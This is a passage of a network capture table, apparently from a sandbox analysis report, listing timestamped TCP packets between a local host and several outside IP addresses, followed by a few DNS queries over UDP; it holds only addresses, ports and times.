                                                                                                                                          Sep 30, 2024 18:58:37.216320992 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.216357946 CEST49757443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.216366053 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.216393948 CEST49757443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.216478109 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.216614008 CEST49757443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.216624022 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.216861010 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.216907024 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.216924906 CEST49757443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.216949940 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.216994047 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.217037916 CEST49757443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.217045069 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.217070103 CEST49757443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.217081070 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.217107058 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.217125893 CEST49757443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.217133999 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.217210054 CEST49757443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.217341900 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.217370987 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.217394114 CEST49757443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.217396021 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.217410088 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.217457056 CEST49757443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.217485905 CEST49757443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.217657089 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.217731953 CEST49757443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.220705032 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.220768929 CEST49757443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.221344948 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.221457005 CEST49757443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.221462011 CEST44349757104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.221510887 CEST49757443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.222095013 CEST49757443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.229959011 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.229991913 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.230092049 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.230109930 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.230128050 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.230230093 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.256489992 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.256516933 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.256566048 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.256588936 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.256614923 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.256731987 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.256779909 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.256870031 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.257189989 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.257230997 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.257260084 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.257265091 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.257297039 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.257534981 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.257580996 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.257587910 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.257920027 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.257978916 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.257985115 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.258050919 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.258419991 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.258480072 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.258486986 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.258555889 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.259119034 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.259135008 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.259171963 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.259191990 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.259202957 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.259224892 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.259790897 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.259877920 CEST49759443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.259892941 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.259906054 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.259985924 CEST49759443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.259994984 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.260078907 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.260148048 CEST49759443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.260154009 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.260242939 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.260283947 CEST49759443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.260298967 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.260467052 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.260545015 CEST49759443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.260550022 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.260726929 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.260735035 CEST49759443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.260740042 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.260772943 CEST49759443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.260786057 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.260823965 CEST49759443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.260828972 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.260865927 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.260895014 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.260904074 CEST49759443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.260926962 CEST49759443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.260931015 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.260945082 CEST49759443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.261135101 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.261203051 CEST49759443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.261209965 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.261550903 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.261590958 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.261617899 CEST49759443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.261626005 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.261662960 CEST49759443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.261862040 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.261924982 CEST49759443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.261929989 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.274174929 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.274274111 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.274276972 CEST49759443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.274286985 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.274318933 CEST44349759104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.274341106 CEST49759443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.274360895 CEST49759443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.274919033 CEST49759443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.279267073 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.279314995 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.279357910 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.279411077 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.279412985 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.279428959 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.279447079 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.279489040 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.279496908 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.279527903 CEST44349758104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.279932976 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.299232006 CEST49758443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:37.931191921 CEST49760443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:37.931271076 CEST44349760162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.931360960 CEST49760443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:37.931570053 CEST49761443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:37.931618929 CEST44349761162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.931694031 CEST49761443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:37.931778908 CEST49760443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:37.931803942 CEST44349760162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:37.931989908 CEST49761443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:37.932007074 CEST44349761162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:38.391657114 CEST44349760162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:38.391736031 CEST49760443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:38.393518925 CEST49760443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:38.393532991 CEST44349760162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:38.393780947 CEST44349760162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:38.394838095 CEST49760443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:38.411823988 CEST44349761162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:38.411917925 CEST49761443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:38.413471937 CEST49761443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:38.413485050 CEST44349761162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:38.413733006 CEST44349761162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:38.414664984 CEST49761443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:38.439405918 CEST44349760162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:38.455400944 CEST44349761162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:38.459338903 CEST49762443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:38.459395885 CEST44349762162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:38.459717989 CEST49762443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:38.460115910 CEST49762443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:38.460124016 CEST44349762162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:38.572282076 CEST44349760162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:38.572343111 CEST44349760162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:38.572598934 CEST49760443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:38.572907925 CEST49760443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:38.595232010 CEST44349761162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:38.595302105 CEST44349761162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:38.595427036 CEST49761443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:38.595954895 CEST49761443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:38.764524937 CEST4975580192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:38.860225916 CEST4975680192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:38.926621914 CEST44349762162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:38.926702023 CEST49762443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:38.930835962 CEST49762443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:38.930844069 CEST44349762162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:38.931094885 CEST44349762162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:38.932579994 CEST49762443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:38.975399971 CEST44349762162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:39.116202116 CEST44349762162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:39.116274118 CEST44349762162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:39.116329908 CEST49762443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:39.116722107 CEST49762443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:39.305143118 CEST4975480192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:51.126413107 CEST49763443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:58:51.126463890 CEST4434976340.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:51.126633883 CEST49763443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:58:51.127580881 CEST49763443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:58:51.127589941 CEST4434976340.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:51.661184072 CEST4974680192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:51.921736956 CEST4434976340.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:51.921808004 CEST49763443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:58:51.924218893 CEST49763443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:58:51.924228907 CEST4434976340.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:51.924505949 CEST4434976340.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:51.928029060 CEST49763443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:58:51.928105116 CEST49763443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:58:51.928109884 CEST4434976340.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:51.928256989 CEST49763443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:58:51.975416899 CEST4434976340.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:52.100943089 CEST4434976340.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:52.101475000 CEST49763443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:58:52.101486921 CEST4434976340.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:52.101519108 CEST49763443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:58:52.101541042 CEST49763443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:03.638154984 CEST49764443192.168.2.520.12.23.50
                                                                                                                                          Sep 30, 2024 18:59:03.638200998 CEST4434976420.12.23.50192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:03.638366938 CEST49764443192.168.2.520.12.23.50
                                                                                                                                          Sep 30, 2024 18:59:03.638817072 CEST49764443192.168.2.520.12.23.50
                                                                                                                                          Sep 30, 2024 18:59:03.638829947 CEST4434976420.12.23.50192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:04.290541887 CEST4434976420.12.23.50192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:04.290618896 CEST49764443192.168.2.520.12.23.50
                                                                                                                                          Sep 30, 2024 18:59:04.292172909 CEST49764443192.168.2.520.12.23.50
                                                                                                                                          Sep 30, 2024 18:59:04.292187929 CEST4434976420.12.23.50192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:04.292561054 CEST4434976420.12.23.50192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:04.293962002 CEST49764443192.168.2.520.12.23.50
                                                                                                                                          Sep 30, 2024 18:59:04.339411974 CEST4434976420.12.23.50192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:04.501454115 CEST4434976420.12.23.50192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:04.501480103 CEST4434976420.12.23.50192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:04.501496077 CEST4434976420.12.23.50192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:04.501550913 CEST49764443192.168.2.520.12.23.50
                                                                                                                                          Sep 30, 2024 18:59:04.501573086 CEST4434976420.12.23.50192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:04.501624107 CEST49764443192.168.2.520.12.23.50
                                                                                                                                          Sep 30, 2024 18:59:04.502545118 CEST4434976420.12.23.50192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:04.502583027 CEST4434976420.12.23.50192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:04.502613068 CEST49764443192.168.2.520.12.23.50
                                                                                                                                          Sep 30, 2024 18:59:04.502619028 CEST4434976420.12.23.50192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:04.502650023 CEST49764443192.168.2.520.12.23.50
                                                                                                                                          Sep 30, 2024 18:59:04.502728939 CEST4434976420.12.23.50192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:04.502775908 CEST49764443192.168.2.520.12.23.50
                                                                                                                                          Sep 30, 2024 18:59:04.505706072 CEST49764443192.168.2.520.12.23.50
                                                                                                                                          Sep 30, 2024 18:59:04.505723000 CEST4434976420.12.23.50192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:04.505733967 CEST49764443192.168.2.520.12.23.50
                                                                                                                                          Sep 30, 2024 18:59:04.505739927 CEST4434976420.12.23.50192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:06.435931921 CEST4974780192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:59:06.598208904 CEST4974580192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:59:16.254029036 CEST49767443192.168.2.5142.250.184.228
                                                                                                                                          Sep 30, 2024 18:59:16.254084110 CEST44349767142.250.184.228192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:16.254213095 CEST49767443192.168.2.5142.250.184.228
                                                                                                                                          Sep 30, 2024 18:59:16.254472971 CEST49767443192.168.2.5142.250.184.228
                                                                                                                                          Sep 30, 2024 18:59:16.254487038 CEST44349767142.250.184.228192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:17.314492941 CEST44349767142.250.184.228192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:17.362153053 CEST49767443192.168.2.5142.250.184.228
                                                                                                                                          Sep 30, 2024 18:59:17.375984907 CEST49767443192.168.2.5142.250.184.228
                                                                                                                                          Sep 30, 2024 18:59:17.376008034 CEST44349767142.250.184.228192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:17.376595020 CEST44349767142.250.184.228192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:17.377104998 CEST49767443192.168.2.5142.250.184.228
                                                                                                                                          Sep 30, 2024 18:59:17.377181053 CEST44349767142.250.184.228192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:17.424602032 CEST49767443192.168.2.5142.250.184.228
                                                                                                                                          Sep 30, 2024 18:59:18.521580935 CEST49768443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:18.521645069 CEST4434976840.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:18.521842003 CEST49768443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:18.522634983 CEST49768443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:18.522656918 CEST4434976840.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:19.318814993 CEST4434976840.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:19.318934917 CEST49768443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:19.322935104 CEST49768443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:19.322948933 CEST4434976840.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:19.323204041 CEST4434976840.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:19.324990988 CEST49768443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:19.325145960 CEST49768443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:19.325153112 CEST4434976840.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:19.325265884 CEST49768443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:19.367410898 CEST4434976840.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:19.500900030 CEST4434976840.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:19.500988007 CEST4434976840.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:19.501228094 CEST49768443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:19.501416922 CEST49768443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:19.501442909 CEST4434976840.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:27.220032930 CEST44349767142.250.184.228192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:27.220118999 CEST44349767142.250.184.228192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:27.220186949 CEST49767443192.168.2.5142.250.184.228
                                                                                                                                          Sep 30, 2024 18:59:28.905777931 CEST49767443192.168.2.5142.250.184.228
                                                                                                                                          Sep 30, 2024 18:59:28.905808926 CEST44349767142.250.184.228192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:44.402079105 CEST4970880192.168.2.5199.232.210.172
                                                                                                                                          Sep 30, 2024 18:59:44.407730103 CEST8049708199.232.210.172192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:44.407823086 CEST4970880192.168.2.5199.232.210.172
                                                                                                                                          Sep 30, 2024 18:59:49.741569996 CEST49770443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:49.741662025 CEST4434977040.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:49.741765976 CEST49770443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:49.742604971 CEST49770443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:49.742640972 CEST4434977040.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:50.528353930 CEST4434977040.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:50.528424025 CEST49770443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:50.530217886 CEST49770443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:50.530230045 CEST4434977040.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:50.530476093 CEST4434977040.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:50.531922102 CEST49770443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:50.531982899 CEST49770443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:50.531987906 CEST4434977040.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:50.532114983 CEST49770443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:50.579410076 CEST4434977040.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:50.702080965 CEST4434977040.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:50.702183962 CEST4434977040.113.103.199192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:50.702284098 CEST49770443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:50.702645063 CEST49770443192.168.2.540.113.103.199
                                                                                                                                          Sep 30, 2024 18:59:50.702677011 CEST4434977040.113.103.199192.168.2.5

                                                                                                                                          UDP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Sep 30, 2024 18:58:10.983424902 CEST6451053192.168.2.51.1.1.1
                                                                                                                                          Sep 30, 2024 18:58:11.925549030 CEST5277753192.168.2.51.1.1.1
                                                                                                                                          Sep 30, 2024 18:58:11.925992966 CEST5841653192.168.2.51.1.1.1
                                                                                                                                          Sep 30, 2024 18:58:11.992819071 CEST6451053192.168.2.51.1.1.1
                                                                                                                                          Sep 30, 2024 18:58:12.300019979 CEST53645101.1.1.1192.168.2.5
